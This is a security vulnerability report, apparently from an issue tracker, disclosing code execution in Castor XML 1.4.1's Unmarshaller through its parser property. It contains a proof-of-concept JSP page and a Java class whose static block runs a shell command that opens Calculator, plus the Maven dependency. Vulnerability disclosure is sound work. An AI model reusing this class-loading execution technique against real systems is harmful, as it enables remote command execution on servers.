Security vulnerability Code execution #91
Description
Code execution when set the Property of the Unmarshaller
Send the request
- Payload:
any string
http://127.0.0.1:8080/xxxxxx/castor.jsp?param=any-string
<%@ page contentType="text/html;charset=UTF-8" pageEncoding="UTF-8" %>
<%@ page import="java.io.ByteArrayInputStream" %>
<%@ page import="org.exolab.castor.xml.Unmarshaller" %>
<%@ page import="javax.xml.transform.stream.StreamSource" %>
<%
try {
String parameter = request.getParameter("param");
ByteArrayInputStream is = new ByteArrayInputStream(parameter.getBytes());
Unmarshaller unmarshaller = new Unmarshaller();
unmarshaller.setProperty("org.exolab.castor.parser", "test.security.CmdTest");
unmarshaller.unmarshal(new StreamSource(is));
} catch (Exception e) {
e.printStackTrace();
}
out.println("over....");
%>package test.security;
public class CmdTest {
static {
try {
Runtime rt = Runtime.getRuntime();
String[] commands = {"/bin/bash","-c","open -a Calculator.app"};
Process pc = rt.exec(commands);
pc.waitFor();
} catch (Exception e) {
}
}
}<dependency>
<groupId>org.codehaus.castor</groupId>
<artifactId>castor-xml</artifactId>
<version>1.4.1</version>
</dependency>